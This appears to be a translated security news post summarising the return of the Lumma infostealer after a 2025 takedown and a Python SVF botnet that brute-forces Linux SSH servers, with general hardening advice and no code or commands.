Cybercriminals don’t disappear, they just change the way they attack. While the Lumma Infostealer recovered quickly after being destroyed, the SVF Botnet showed new levels of danger targeting the SSH Linux server. Here’s WhiteHat’s detailed synthesis of two recent emerging threats.

1753259327404.png

1. Lumma Infostealer re-emerged strongly after scan

In May 2025, international law enforcement seized over 2,300 domains and part of the Lumma Stealer’s control infrastructure (C2), Malwarebytes that stole information operating under the Malware – as – a-Service (MaaS) model.

However, only a few weeks later, experts again noted that the Lumma had quickly recovered almost completely, switching to new infrastructure such as Selectel (Russia) to avoid detection and continue to spread aggressively.

1753255472418.png

Photograph: Hfrance

Current main transmission channels include:

  • Fake Cracks/keygens via Malvertising and Fake Search Results
  • Fake CAPTCHA (ClickFix) using PowerShell to load malicious code to memory
  • Fake GitHub containing cheat/game crack containing Lumma payloads
  • YouTube/Facebook videos lead to sites with malicious code, sometimes through sites.google.com

The strong re-emergence of Lumma shows that MaaS platforms have the potential to recover very quickly without strong enough legal measures such as arrest or prosecution. This continues to be a worrying threat to users and businesses.

2. Botnet SVF – New threat targeting Linux SSH server

A new attack campaign is taking advantage of weakly configured SSH Linux servers to deploy SVF botnet, a Python – based malicious code, which allows attackers to remotely control the system through the low – monitored Discord platform.

Manner of infection: SVF Botnet attacks Linux servers via brute-force SSH, installs payloads using automated shell command sequences, remotely controls via Discord and performs large-scale DDoS attacks, and has the ability to anonymize and self-control proxies to increase attack efficiency.

1753255407751.png

SVF bot danger features:

  • Large scale DDoS support with HTTP Flood (L7) and UDP Flood techniques (L4).
  • Automatically collect proxies from public sites, verify them, and use them to hide the source of the attack.
  • Discord remote control interface: Allows hackers to send commands, manage infected machines, customize attack parameters, update or remove bots remotely, even non-experts.

Danger level:

  • The code updates itself and can be easily added to new functionality by writing in Python.
  • It is difficult to detect due to its use of the popular platform (Discord) as C2.
  • Persistent attacks on weakly configured SSH servers, indicating an urgent need to strengthen Linux infrastructure security.

Linux server protection recommendations:

  • Change the strong, unique password, and disable login with the password if possible.
  • Limit SSH access to trusted IP (via firewall) only.
  • Update your operating system and software regularly to fix bugs.
  • Surveillance of SSH logs, deployment of an intrusion detection system (IDS).
  • Disable unnecessary services to narrow the attack.

SVF Botnet shows that the new era botnet is no longer restricted to Windows. Linux is also being an attractive target, and any SSH system that is unconfigured can become instrumental in global DDoS attacks.

Summary

Both the Lumma Infostealer threat and the SVF botnet showed an increasingly sophisticated malware trend, which was difficult to suppress despite legal and technical measures. This fact underscores the importance of a multi-layer security implementation combined with continuous monitoring and timely response to protect the system in the era of modern MaaS and botnet.

Source: Cyber Press, Bleeping Computer